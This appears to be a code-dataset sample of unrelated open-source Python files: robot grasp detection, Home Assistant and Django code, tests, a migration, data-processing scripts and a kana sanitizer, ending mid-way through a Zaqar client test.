points_out[depth_nan] = 0
with TimeIt('Trig'):
# Calculate the angle map.
cos_out = pred_out[1].squeeze()
sin_out = pred_out[2].squeeze()
ang_out = np.arctan2(sin_out, cos_out)/2.0
width_out = pred_out[3].squeeze() * 150.0 # Scaled 0-150:0-1
with TimeIt('Filter'):
# Filter the outputs.
points_out = ndimage.filters.gaussian_filter(points_out, 5.0) # 3.0
ang_out = ndimage.filters.gaussian_filter(ang_out, 2.0)
with TimeIt('Control'):
# Calculate the best pose from the camera intrinsics.
maxes = None
ALWAYS_MAX = False # Use ALWAYS_MAX = True for the open-loop solution.
if ROBOT_Z > 0.34 or ALWAYS_MAX: # > 0.34 initialises the max tracking when the robot is reset.
# Track the global max.
max_pixel = np.array(np.unravel_index(np.argmax(points_out), points_out.shape))
prev_mp = max_pixel.astype(np.int)
else:
            # Calculate a set of local maxes. Choose the one closest to the previous one.
maxes = peak_local_max(points_out, min_distance=10, threshold_abs=0.1, num_peaks=3)
if maxes.shape[0] == 0:
return
max_pixel = maxes[np.argmin(np.linalg.norm(maxes - prev_mp, axis=1))]
# Keep a global copy for next iteration.
prev_mp = (max_pixel * 0.5 + prev_mp * 0.5).astype(np.int)
ang = ang_out[max_pixel[0], max_pixel[1]]
width = width_out[max_pixel[0], max_pixel[1]]
# Convert max_pixel back to uncropped/resized image coordinates in order to do the camera transform.
max_pixel = ((np.array(max_pixel) / 300.0 * crop_size) + np.array([(480 - crop_size)//2, (640 - crop_size) // 2]))
max_pixel = np.round(max_pixel).astype(np.int)
point_depth = depth[max_pixel[0], max_pixel[1]]
# These magic numbers are my camera intrinsic parameters.
x = (max_pixel[1] - cx)/(fx) * point_depth
y = (max_pixel[0] - cy)/(fy) * point_depth
z = point_depth.astype(np.float32)
if np.isnan(z):
return
with TimeIt('Draw'):
# Draw grasp markers on the points_out and publish it. (for visualisation)
grasp_img = np.zeros((300, 300, 3), dtype=np.uint8)
points_out = np.clip(points_out*255, 0, 255)
grasp_img[:,:,2] = (points_out)
grasp_img_plain = grasp_img.copy()
rr, cc = circle(prev_mp[0], prev_mp[1], 5)
grasp_img[rr, cc, 0] = 0
grasp_img[rr, cc, 1] = 255
grasp_img[rr, cc, 2] = 0
with TimeIt('Publish'):
# Publish the output images (not used for control, only visualisation)
grasp_img = bridge.cv2_to_imgmsg(grasp_img, 'bgr8')
grasp_img.header = depth_message.header
grasp_pub.publish(grasp_img)
grasp_img_plain = bridge.cv2_to_imgmsg(grasp_img_plain, 'bgr8')
grasp_img_plain.header = depth_message.header
#grasp_plain_pub.publish(grasp_img_plain)
#depth_pub.publish(bridge.cv2_to_imgmsg(depth_crop))
#ang_pub.publish(bridge.cv2_to_imgmsg(ang_out))
# Output the best grasp pose relative to camera.
cmd_msg = Float32MultiArray()
cmd_msg.data = [x, y, z, ang, width, depth_center]
#print ("DATA: ", cmd_msg.data)
cmd_pub.publish(cmd_msg)
depth_sub = rospy.Subscriber('object_detection/depth_GG', Image, depth_callback, queue_size=1)
#robot_pos_sub = rospy.Subscriber('/UR5_pose', PoseStamped, robot_pos_callback, queue_size=1)
rospy.spin()
avg_line_length: 35.287611 | max_line_length: 148 | alphanum_fraction: 0.66721
794d901cce31a0a30bd38682d72b9a79afb6fefd | size: 722 | py | Python | homeassistant/components/zwave/websocket_api.py | bigiot/home-assistant @ 2e6038b6405885deafa64f4e710e2207ce0ee582 | ["Apache-2.0"] | stars: null | issues: null | forks: 2 (2019-01-21..2019-02-19)
"""Web socket API for Z-Wave."""
import logging
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.core import callback
from .const import DATA_NETWORK
_LOGGER = logging.getLogger(__name__)
TYPE = "type"
ID = "id"
@websocket_api.require_admin
@websocket_api.websocket_command({vol.Required(TYPE): "zwave/network_status"})
def websocket_network_status(hass, connection, msg):
"""Get Z-Wave network status."""
network = hass.data[DATA_NETWORK]
connection.send_result(msg[ID], {"state": network.state})
@callback
def async_load_websocket_api(hass):
"""Set up the web socket API."""
websocket_api.async_register_command(hass, websocket_network_status)
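# Illustration of the wire format (hypothetical message id): a client sends
#   {"id": 5, "type": "zwave/network_status"}
# and receives a result message whose payload is {"state": <network.state>}.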
avg_line_length: 24.066667 | max_line_length: 78 | alphanum_fraction: 0.764543
794d917af94edfbc51cfb12c2810fc8c40a42f7e | size: 2554 | py | Python | ditto/dittoforms/utils.py | Kvoti/ditto @ eb4efb241e54bf679222d14afeb71d9d5441c122 | ["BSD-3-Clause"] | stars: null | issues: 9 (2015-11-10..2015-11-12) | forks: null
import json
from django import forms
from .models import FormSubmission
class FormFromSpecMixin(object):
def add_fields_from_spec(self, spec):
for item in spec:
if 'on' in item and not item['on']:
continue
if 'fields' in item:
# group of fields
# TODO form config should probably separate out UI stuff like field grouping
# from field definitions
for field_spec in item['fields']:
self.add_field(field_spec)
else:
self.add_field(item)
def add_field(self, spec):
if 'on' in spec and not spec['on']:
return
if 'required' not in spec:
spec['required'] = False
if 'options' in spec: # TODO better to have explicit types for fields
if spec.get('multiple', False):
self.add_multi_choice_field(spec)
else:
self.add_choice_field(spec)
else:
self.add_text_field(spec)
def add_text_field(self, spec):
self.fields[spec['name']] = forms.CharField(
max_length=100, required=spec['required']
)
def add_choice_field(self, spec):
choices = zip(spec['options'], spec['options'])
self.fields[spec['name']] = forms.ChoiceField(
choices=choices,
required=spec['required']
)
def add_multi_choice_field(self, spec):
choices = zip(spec['options'], spec['options'])
self.fields[spec['name']] = forms.MultipleChoiceField(
choices=choices,
required=spec['required']
)
def save_submission(self, spec, user):
FormSubmission.objects.create(
form=spec,
user=user,
# TODO just extract relevant fields from self.data (
# form might have extra fields or other metadata in self.data)
data=json.dumps(self.data)
)
class Form(FormFromSpecMixin, forms.Form):
"""
Create a form from config.
    Only used for server-side validation of POSTed data, not for form display.
"""
def __init__(self, user, spec, *args, **kwargs):
super(Form, self).__init__(*args, **kwargs)
self.user = user
self.spec = spec
self.add_fields_from_spec(json.loads(spec.spec))
def save(self):
FormSubmission.objects.create(
user=self.user,
form=self.spec,
data=json.dumps(self.data)
)
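# Illustration (hypothetical spec) of the JSON this mixin consumes:
#   [{"name": "age", "required": True},
#    {"name": "colours", "options": ["red", "blue"], "multiple": True},
#    {"fields": [{"name": "nickname"}, {"name": "bio"}]}]
# Plain entries become CharFields, entries with "options" become (multiple)
# choice fields, and "fields" groups are flattened field by field.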
avg_line_length: 30.404762 | max_line_length: 92 | alphanum_fraction: 0.568912
794d9286b786da4b4a6a8c9a1266f29a7750d86b | size: 2529 | py | Python | app/recipe/tests/test_tags_api.py | emeraldev/recipe-app-api @ 9483c71c85e55b4ba3de9af7e30aecb7b39fe194 | ["MIT"] | stars: null | issues: null | forks: null
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTests(TestCase):
"""Test the publicly available tags API"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""Test that login required for retrieving tags"""
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""Test the private tags API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
'test@spielage.com',
'password'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags_list(self):
"""Test retrieving tags"""
Tag.objects.create(user=self.user, name='Vegan')
Tag.objects.create(user=self.user, name='Dessert')
res = self.client.get(TAGS_URL)
tags = Tag.objects.all().order_by('-name')
serializer = TagSerializer(tags, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_tags_limited_to_user(self):
"""Test that tags returned are for authenticated user"""
user2 = get_user_model().objects.create_user(
'other@spielage.com',
'testpass'
)
Tag.objects.create(user=user2, name='Fruity')
tag = Tag.objects.create(user=self.user, name='Comfort Food')
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]['name'], tag.name)
def test_create_tag_successful(self):
"""Test creating a new tag"""
payload = {'name': 'Test Tag'}
self.client.post(TAGS_URL, payload)
exists = Tag.objects.filter(
user=self.user,
name=payload['name']
).exists()
self.assertTrue(exists)
def test_create_tag_invalid(self):
"""Test creating a new tag with invalid payload"""
payload = {'name': ''}
res = self.client.post(TAGS_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
avg_line_length: 30.107143 | max_line_length: 71 | alphanum_fraction: 0.654013
794d9297da5d65c5f2b6ad7582e2d89e85450ce3 | size: 608 | py | Python | api/util/stub.py | aleibovici/datrium_natural_hazard_protection @ 7ae593050765d8d30bbc08b436bbe334e59d985a | ["Apache-2.0"] | stars: null | issues: null | forks: null
#!/usr/bin/env python
#**************************************************************
#* Copyright (c) 2017 Datrium, Inc. All rights reserved. *
#* -- Datrium Confidential -- *
#**************************************************************
from datrium.rpc.client.stub_factory import StubFactory
from .api_invoker import ApiInvoker
def get_stub(dvx, iface):
"""
Get stub to invoke APIs
"""
api = ApiInvoker(user_name=dvx.user_name, password=dvx.password)
stub_factory = StubFactory(api)
return stub_factory.create_stub(iface, endpoint=dvx.ip)
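# Illustration (hypothetical interface name):
#   stub = get_stub(dvx, 'SystemInfo')
# after which RPCs on that interface are invoked against dvx.ip using the
# credentials carried by dvx.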
avg_line_length: 33.777778 | max_line_length: 68 | alphanum_fraction: 0.524671
794d92a0431f481e02accf68302593fe5736e4fc | size: 168 | py | Python | data/kernel_binaries/assemble.py | harskish/Fluctus @ 861cf7a88c3b6ac2c051c67b6216e36653eb64f7 | ["MIT"] | stars: 52 (2017-06-26..2022-01-12) | issues: null | forks: 14 (2018-11-07..2021-12-25)
import glob
import os
files = glob.glob("*.cl.ptx")
for ptx in files:
inst = "ptxas {} -o {}.elf --gpu-name sm_61".format(ptx, ptx[:-4])
print(inst)
os.system(inst)
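# Equivalent invocation via subprocess (sketch), which avoids the shell-quoting
# pitfalls of os.system:
#   import subprocess
#   subprocess.run(["ptxas", ptx, "-o", ptx[:-4] + ".elf",
#                   "--gpu-name", "sm_61"], check=True)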
avg_line_length: 21 | max_line_length: 67 | alphanum_fraction: 0.642857
794d933e7f84d7c02670ce9deaad985a3fb08578 | size: 325 | py | Python | pollme/urls.py | satya1145/Django-Poll-App-master @ aa1649cb11ff34e3c1ae6bf3364c53eb1939db51 | ["MIT"] | stars: 20 (2021-05-02..2021-07-09) | issues: 3 (2021-06-01..2021-06-08) | forks: 1 (2021-09-12)
from django.contrib import admin
from django.urls import path, include
from . import views
urlpatterns = [
path('admin/', admin.site.urls),
path('home/', views.home, name='home'),
path('polls/', include('polls.urls', namespace="polls")),
path('accounts/', include('accounts.urls', namespace="accounts")),
]
avg_line_length: 27.083333 | max_line_length: 70 | alphanum_fraction: 0.673846
794d9382fa884a04bda75abf14f7cbf6b8aa925c | size: 1754 | py | Python | tensorflow_probability/python/internal/backend/numpy/deprecation.py | brianwa84/probability @ 6f8e78d859ac41170be5147c8c7bde54cc5aa83e | ["Apache-2.0"] | stars: 2 (2020-12-17..2021-06-11) | issues: 2 (2021-08-25..2022-02-10) | forks: 1 (2020-05-31)
# Copyright 2020 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Stub implementation of tensorflow.python.util.deprecation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
# pylint: disable=unused-argument
def deprecated_alias(deprecated_name, name, func_or_class, warn_once=True):
return func_or_class
def deprecated_endpoints(*args):
return lambda func: func
def deprecated(date, instructions, warn_once=True):
return lambda func: func
def deprecated_args(date, instructions, *deprecated_arg_names_or_tuples,
**kwargs):
return lambda func: func
def deprecated_arg_values(date, instructions, warn_once=True,
**deprecated_kwargs):
return lambda func: func
def deprecated_argument_lookup(new_name, new_value, old_name, old_value):
if old_value is not None:
if new_value is not None:
raise ValueError("Cannot specify both '%s' and '%s'" %
(old_name, new_name))
return old_value
return new_value
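# Illustration of the lookup above:
#   deprecated_argument_lookup('new', None, 'old', 3)   -> 3
#   deprecated_argument_lookup('new', 2, 'old', None)   -> 2
#   deprecated_argument_lookup('new', 2, 'old', 3)      -> ValueError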
@contextlib.contextmanager
def silence():
yield
avg_line_length: 29.233333 | max_line_length: 78 | alphanum_fraction: 0.710946
794d940441c6265f656c5126900f6634e58621c0 | size: 1491 | py | Python | app/forms.py | lambrosopos/bible-school-web-app @ 7206026d0cb014c518314b76bd6fd7a223582044 | ["MIT"] | stars: null | issues: null | forks: null
from django import forms
from django.utils.translation import gettext_lazy as _
from .models import Student
class StudentForm(forms.ModelForm):
class Meta:
model = Student
        fields = ['name', 'title', 'contact', 'memo', 'church', 'cohort']
        widgets = {
            "name": forms.TextInput(
                attrs={
                    # "Please enter your name (e.g. Hong Gildong)"
                    "placeholder": "이름을 입력해주세요 (예: 홍길동)"
                }
            ),
            "title": forms.Select(
                attrs={
                    # "Please select your current title (if it is missing, contact an administrator)"
                    "placeholder": "현재 담당하고 있는 직책을 선택해주세요"
                                   "(없는 경우에는 관리자에게 문의해주세요)"
                }
            ),
            "contact": forms.TextInput(
                attrs={
                    # "(example: 010-1234-4321)"
                    "placeholder": "(예시: 010-1234-4321)"
                }
            ),
            "church": forms.Select(
                attrs={
                    # "Please select the church you currently attend (if it is missing, contact an administrator)"
                    "placeholder": "현재 출석중인 계시는 교회를 선택해주세요"
                                   "(없는 경우 관리자에게 문의해주세요)"
                }
            ),
            "cohort": forms.Select(
                attrs={
                    # "Please select the cohort to register for"
                    "placeholder": "등록할 기수를 선택해주세요"
                }
            ),
            "memo": forms.Textarea(
                attrs={
                    # "Write any additional notes if needed"
                    "placeholder": "추가로 필요한 메모가 있다면 적어주세요"
                }
            ),
        }
        labels = {
            "name": _("이름"),      # "Name"
            "title": _("직책"),     # "Title"
            "contact": _("연락처"),  # "Contact"
            "church": _("교회"),    # "Church"
            "cohort": _("기수"),    # "Cohort"
            "memo": _("메모")       # "Memo"
        }
avg_line_length: 28.132075 | max_line_length: 74 | alphanum_fraction: 0.380952
794d94442dfccd9fb0860ed1722ed3107bbed462 | size: 1244 | py | Python | qiime_16s/combine_collapsed_otu_tables.py | lotrus28/TaboCom @ b67d66e4c410375a9efa08c5e637301e78e9204b | ["Apache-2.0"] | stars: null | issues: null | forks: null
import sys
import re
import pandas as pd
def combine_otu_tables(path_to_files):
with open(path_to_files) as a:
filenames = a.read().splitlines()
separated = {re.search(r'ERR\d+?(?=_)',x).group(0):pd.read_table(x, sep = '\t', index_col = 1, header = None,engine='python')
for x in filenames}
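    # e.g. (illustration) re.search(r'ERR\d+?(?=_)', 'ERR123456_L1.txt').group(0)
    # yields 'ERR123456': the lazy \d+? expands until the lookahead sees '_'.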
indices = [list(x.index) for x in list(separated.values())]
all_taxa = sum(indices,[])
all_taxa = list(set(all_taxa))
altogether = pd.DataFrame(None, columns = list(separated.keys()), index = all_taxa)
for pat in separated:
altogether[pat] = separated[pat][0]
altogether = altogether.fillna(0)
altogether['Mean'] = altogether.mean(axis = 1)
    # Parse major/minor as integers: a naive float(pd.__version__[:4]) breaks
    # on versions such as '1.3.5'.
    pd_version = tuple(int(p) for p in pd.__version__.split('.')[:2])
    if pd_version >= (0, 17):
        altogether = altogether.sort_values('Mean', axis = 0, ascending=False)
    else:
        altogether = altogether.sort('Mean', axis = 0, ascending=False)
    # drop the helper 'Mean' column (.iloc replaces the long-deprecated .ix)
    return altogether.iloc[:, :-1]
def main():
# list_of_files = 'temp2.txt'
# output = 'combined.txt'
list_of_files = sys.argv[1]
output = sys.argv[2]
combined = combine_otu_tables(list_of_files)
print('Combining all OTU-tables')
combined.to_csv(output, sep = '\t')
if __name__ == "__main__":
main()
avg_line_length: 30.341463 | max_line_length: 129 | alphanum_fraction: 0.639871
794d94b3b6202103969dece6193fe5cd4f56b8d5 | size: 8914 | py | Python | adminsortable/admin.py | dokterbob/django-admin-sortable @ 4e5e4af8b157cc323acbb69491f1b08b9f3e62bf | ["MS-PL", "Naumen", "Condor-1.1", "Apache-1.1"] | stars: null | issues: null | forks: null
import json
from django.conf import settings
from django.conf.urls.defaults import patterns, url
from django.contrib.admin import ModelAdmin, TabularInline, StackedInline
from django.contrib.admin.options import InlineModelAdmin
from django.contrib.contenttypes.models import ContentType
from django.http import HttpResponse
from django.shortcuts import render
from django.template.defaultfilters import capfirst
from django.views.decorators.csrf import csrf_exempt
from adminsortable.fields import SortableForeignKey
from adminsortable.models import Sortable
STATIC_URL = settings.STATIC_URL
class SortableAdmin(ModelAdmin):
ordering = ('order', 'id')
class Meta:
abstract = True
def _get_sortable_foreign_key(self):
sortable_foreign_key = None
for field in self.model._meta.fields:
if isinstance(field, SortableForeignKey):
sortable_foreign_key = field
break
return sortable_foreign_key
def __init__(self, *args, **kwargs):
super(SortableAdmin, self).__init__(*args, **kwargs)
self.has_sortable_tabular_inlines = False
self.has_sortable_stacked_inlines = False
for klass in self.inlines:
if issubclass(klass, SortableTabularInline):
if klass.model.is_sortable():
self.has_sortable_tabular_inlines = True
if issubclass(klass, SortableStackedInline):
if klass.model.is_sortable():
self.has_sortable_stacked_inlines = True
def get_urls(self):
urls = super(SortableAdmin, self).get_urls()
admin_urls = patterns('',
url(r'^sorting/do-sorting/(?P<model_type_id>\d+)/$',
self.admin_site.admin_view(self.do_sorting_view),
name='admin_do_sorting'), #this view changes the order
url(r'^sort/$', self.admin_site.admin_view(self.sort_view),
name='admin_sort'), #this view shows a link to the drag-and-drop view
)
return admin_urls + urls
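    # Note (illustrative): with the default admin URL namespace these routes
    # would typically be resolved as reverse('admin:admin_sort') and
    # reverse('admin:admin_do_sorting', args=[model_type_id]).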
def sort_view(self, request):
"""
Custom admin view that displays the objects as a list whose sort order can be
changed via drag-and-drop.
"""
opts = self.model._meta
admin_site = self.admin_site
has_perm = request.user.has_perm(opts.app_label + '.' + opts.get_change_permission())
objects = self.model.objects.all()
#Determine if we need to regroup objects relative to a foreign key specified on the
# model class that is extending Sortable.
#Legacy support for 'sortable_by' defined as a model property
sortable_by_property = getattr(self.model, 'sortable_by', None)
#`sortable_by` defined as a SortableForeignKey
sortable_by_fk = self._get_sortable_foreign_key()
if sortable_by_property:
#backwards compatibility for < 1.1.1, where sortable_by was a classmethod instead of a property
try:
sortable_by_class, sortable_by_expression = sortable_by_property()
            except (TypeError, ValueError):
sortable_by_class = self.model.sortable_by
sortable_by_expression = sortable_by_class.__name__.lower()
sortable_by_class_display_name = sortable_by_class._meta.verbose_name_plural
sortable_by_class_is_sortable = sortable_by_class.is_sortable()
elif sortable_by_fk:
#get sortable by properties from the SortableForeignKey field - supported in 1.3+
sortable_by_class_display_name = sortable_by_fk.rel.to._meta.verbose_name_plural
sortable_by_class = sortable_by_fk.rel.to
sortable_by_expression = sortable_by_fk.name.lower()
sortable_by_class_is_sortable = sortable_by_class.is_sortable()
else:
#model is not sortable by another model
sortable_by_class = sortable_by_expression = sortable_by_class_display_name =\
sortable_by_class_is_sortable = None
if sortable_by_property or sortable_by_fk:
# Order the objects by the property they are sortable by, then by the order, otherwise the regroup
# template tag will not show the objects correctly as
# shown in https://docs.djangoproject.com/en/1.3/ref/templates/builtins/#regroup
objects = objects.order_by(sortable_by_expression, 'order')
try:
verbose_name_plural = opts.verbose_name_plural.__unicode__()
except AttributeError:
verbose_name_plural = opts.verbose_name_plural
context = {
'title' : 'Drag and drop %s to change display order' % capfirst(verbose_name_plural),
'opts' : opts,
'app_label' : opts.app_label,
'has_perm' : has_perm,
'objects' : objects,
'group_expression' : sortable_by_expression,
'sortable_by_class' : sortable_by_class,
'sortable_by_class_is_sortable' : sortable_by_class_is_sortable,
'sortable_by_class_display_name' : sortable_by_class_display_name
}
return render(request, 'adminsortable/change_list.html', context)
def changelist_view(self, request, extra_context=None):
"""
If the model that inherits Sortable has more than one object,
its sort order can be changed. This view adds a link to the object_tools
block to take people to the view to change the sorting.
"""
if self.model.is_sortable():
self.change_list_template = 'adminsortable/change_list_with_sort_link.html'
return super(SortableAdmin, self).changelist_view(request, extra_context=extra_context)
def change_view(self, request, object_id, extra_context=None):
if self.has_sortable_tabular_inlines or self.has_sortable_stacked_inlines:
self.change_form_template = 'adminsortable/change_form.html'
extra_context = {
'has_sortable_tabular_inlines' : self.has_sortable_tabular_inlines,
'has_sortable_stacked_inlines' : self.has_sortable_stacked_inlines
}
return super(SortableAdmin, self).change_view(request, object_id, extra_context=extra_context)
@csrf_exempt
def do_sorting_view(self, request, model_type_id=None):
"""
This view sets the ordering of the objects for the model type and primary keys
passed in. It must be an Ajax POST.
"""
        response = {'objects_sorted' : False}
        if request.is_ajax() and request.method == 'POST':
            try:
                indexes = map(str, request.POST.get('indexes', '').split(','))
                klass = ContentType.objects.get(id=model_type_id).model_class()
                objects_dict = dict([(str(obj.pk), obj) for obj in klass.objects.filter(pk__in=indexes)])
                if '-order' in klass._meta.ordering: #desc order
                    start_object = max(objects_dict.values(), key=lambda x: getattr(x, 'order'))
                    start_index = getattr(start_object, 'order') or len(indexes)
                    step = -1
                else: #'order' is default, asc order
                    start_object = min(objects_dict.values(), key=lambda x: getattr(x, 'order'))
                    start_index = getattr(start_object, 'order') or 0
                    step = 1
                for index in indexes:
                    obj = objects_dict.get(index)
                    setattr(obj, 'order', start_index)
                    obj.save()
                    start_index += step
                response = {'objects_sorted' : True}
            except (KeyError, IndexError, ContentType.DoesNotExist, AttributeError):
                #a missing key, a stale ContentType or a non-sortable model all
                #fall through to the default 'not sorted' response
                pass
return HttpResponse(json.dumps(response, ensure_ascii=False),
mimetype='application/json')
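    # Illustrative request sketch (added; the payload below is hypothetical).
    # The drag-and-drop template is expected to POST the new ordering as a
    # single comma-separated 'indexes' parameter, e.g. for ContentType id 12:
    #
    #   POST .../sorting/do-sorting/12/
    #   indexes=7,3,9,1
    #
    # do_sorting_view() then re-assigns consecutive 'order' values starting
    # from the current minimum (or counting down from the maximum when the
    # model's Meta.ordering contains '-order').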
class SortableInlineBase(InlineModelAdmin):
def __init__(self, *args, **kwargs):
super(SortableInlineBase, self).__init__(*args, **kwargs)
if not issubclass(self.model, Sortable):
raise Warning(u'Models that are specified in SortableTabluarInline and SortableStackedInline '
'must inherit from Sortable')
self.is_sortable = self.model.is_sortable()
class SortableTabularInline(SortableInlineBase, TabularInline):
"""Custom template that enables sorting for tabular inlines"""
template = 'adminsortable/edit_inline/tabular.html'
class SortableStackedInline(SortableInlineBase, StackedInline):
"""Custom template that enables sorting for stacked inlines"""
template = 'adminsortable/edit_inline/stacked.html'
| 45.948454
| 111
| 0.645277
|
794d955abe7c2e57c598ccba89b526dccd45098e
| 766
|
py
|
Python
|
migrations/versions/2ea41f4610fd_.py
|
boladmin/security_monkey
|
c28592ffd518fa399527d26262683fc860c30eef
|
[
"Apache-2.0"
] | 4,258
|
2015-01-04T22:06:10.000Z
|
2022-03-31T23:40:27.000Z
|
migrations/versions/2ea41f4610fd_.py
|
boladmin/security_monkey
|
c28592ffd518fa399527d26262683fc860c30eef
|
[
"Apache-2.0"
] | 1,013
|
2015-01-12T02:31:03.000Z
|
2021-09-16T19:09:03.000Z
|
migrations/versions/2ea41f4610fd_.py
|
boladmin/security_monkey
|
c28592ffd518fa399527d26262683fc860c30eef
|
[
"Apache-2.0"
] | 965
|
2015-01-11T21:06:07.000Z
|
2022-03-17T16:53:57.000Z
|
"""Increasing size of name field to accomodate longer AWS Resource IDs
Revision ID: 2ea41f4610fd
Revises: 1727fb4309d8
Create Date: 2016-04-18 17:59:04.622111
"""
# revision identifiers, used by Alembic.
revision = '2ea41f4610fd'
down_revision = '1727fb4309d8'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column('item', 'name', type_=sa.VARCHAR(303), existing_type=sa.VARCHAR(length=285), nullable=True)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column('item', 'name', type_=sa.VARCHAR(285), existing_type=sa.VARCHAR(length=303), nullable=True)
### end Alembic commands ###
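# Usage note (added): with Alembic configured for this project, the revision is
# applied or rolled back from the command line:
#
#   alembic upgrade 2ea41f4610fd
#   alembic downgrade 1727fb4309d8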
| 28.37037
| 111
| 0.718016
|
794d967a74c5e27749cd76fcccbe8f03d16ae821
| 3,234
|
py
|
Python
|
sanitize_kana.py
|
blueset/vocaloid-yomigana
|
240549955342bb4b02d0abcf21753809f8b9278c
|
[
"MIT"
] | 1
|
2021-09-06T22:44:10.000Z
|
2021-09-06T22:44:10.000Z
|
sanitize_kana.py
|
blueset/vocaloid-yomigana
|
240549955342bb4b02d0abcf21753809f8b9278c
|
[
"MIT"
] | null | null | null |
sanitize_kana.py
|
blueset/vocaloid-yomigana
|
240549955342bb4b02d0abcf21753809f8b9278c
|
[
"MIT"
] | null | null | null |
#%%
import MeCab
from pyokaka import okaka
import csv
import jaconv
import unicodedata
import re
tagger = MeCab.Tagger('-d /usr/local/lib/mecab/dic/mecab-ipadic-neologd --node-format="%M\t%f[7]\n" --unk-format="%M\t%M\n"')
prefix = "outcomes/fandom/fandom"
# %%
def romaji_to_hiragana(romaji):
return strip_punct(okaka.convert(romaji))
# %%
rows = []
with open(prefix + '.csv', newline='') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',', quotechar='"')
for row in spamreader:
rows.append(list(map(jaconv.normalize, row)))
# %%
def strip_punct(s):
return ''.join(c for c in jaconv.normalize(s) if unicodedata.category(c)[0] == 'L')
# %%
def kata_to_hira(s):
return ''.join(map(jaconv.kata2hira, s))
# %%
kana_pattern = re.compile(r'^[\u3041-\u3096\u30A1-\u30FAー]*$')
def all_kana(s):
return kana_pattern.match(strip_punct(s)) is not None
# %%
hira_pattern = re.compile(r'[\u3041-\u3096]+')
def find_all_hiragana(s):
return hira_pattern.findall(strip_punct(s))
# %%
hira_kan_pattern = re.compile(r'^[\u3041-\u3096々〇〻\u3400-\u9FFF\uF900-\uFAFF]+$')
def all_hira_kan(s):
return hira_kan_pattern.match(strip_punct(s)) is not None
# %%
def construct_kana(orig):
r = list(map(lambda a: a.split("\t"), tagger.parse(orig).split('\n')))[:-2]
return r, "".join(map(lambda a: a[1], r))
#%%
def sort_name(romaji, orig):
if all_kana(strip_punct(orig)):
return strip_punct(kata_to_hira(orig)), "safe"
recovered = romaji_to_hiragana(romaji)
if not recovered or not all_kana(recovered):
recovered = None
matching = recovered is not None
constructed_pairs, constructed = construct_kana(orig)
constructed = strip_punct(kata_to_hira(constructed))
if not all_hira_kan(kata_to_hira(strip_punct(orig))):
return constructed, "review"
if recovered is not None:
for kan, kata in constructed_pairs:
hira = kata_to_hira(kata)
if all_hira_kan(kan):
print("matching", hira, "in", recovered)
matching = matching and hira in recovered
return constructed, "safe" if matching else "review"
else:
return constructed, "review"
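# Illustrative behavior sketch (added; the example strings are hypothetical and
# the exact readings depend on the MeCab dictionary in use):
#
#   sort_name('hatsune miku', '初音ミク')
#   # -> ('はつねみく', 'safe')   when the MeCab reading agrees with the romaji
#   sort_name('', '重音テト')
#   # -> (constructed reading, 'review')  no romaji available to cross-check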
# %%
with_romaji = [i for i in rows if i[0]]
without_romaji = [i for i in rows if not i[0]]
# %%
to_review = []
no_romaji_to_review = []
safe = []
for romaji, orig in with_romaji:
kana, status = sort_name(romaji, orig)
if status == "safe":
safe.append((romaji, orig, kana))
elif status == "review":
to_review.append((romaji, orig, kana))
for romaji, orig in without_romaji:
kana, status = sort_name(romaji, orig)
if status == "safe":
safe.append((romaji, orig, kana))
elif status == "review":
no_romaji_to_review.append((romaji, orig, kana))
# %%
def write_csv(data, fn):
    with open(fn, 'w', newline='') as csvfile:
        writer = csv.writer(csvfile, delimiter=',',
                            quotechar='"', quoting=csv.QUOTE_MINIMAL)
        for i in data:
            writer.writerow(i)
# %%
write_csv(safe, prefix + "_safe.csv")
write_csv(to_review, prefix + "_to_review.csv")
write_csv(no_romaji_to_review, prefix + "_no_romaji_to_review.csv")
# %%
| 29.944444
| 125
| 0.649041
|
794d96a7082cb3e1850d0f14a5256cc0780a81e6
| 1,993
|
py
|
Python
|
heat/tests/clients/test_zaqar_client.py
|
jasondunsmore/heat
|
6bd7352dc4838b8ef782f2345a4dfdf57ba3e356
|
[
"Apache-2.0"
] | 1
|
2015-12-18T21:46:55.000Z
|
2015-12-18T21:46:55.000Z
|
heat/tests/clients/test_zaqar_client.py
|
jasondunsmore/heat
|
6bd7352dc4838b8ef782f2345a4dfdf57ba3e356
|
[
"Apache-2.0"
] | null | null | null |
heat/tests/clients/test_zaqar_client.py
|
jasondunsmore/heat
|
6bd7352dc4838b8ef782f2345a4dfdf57ba3e356
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from heat.engine.clients.os import zaqar
from heat.tests import common
from heat.tests import utils
class ZaqarClientPluginTest(common.HeatTestCase):
def test_create(self):
context = utils.dummy_context()
plugin = context.clients.client_plugin('zaqar')
client = plugin.client()
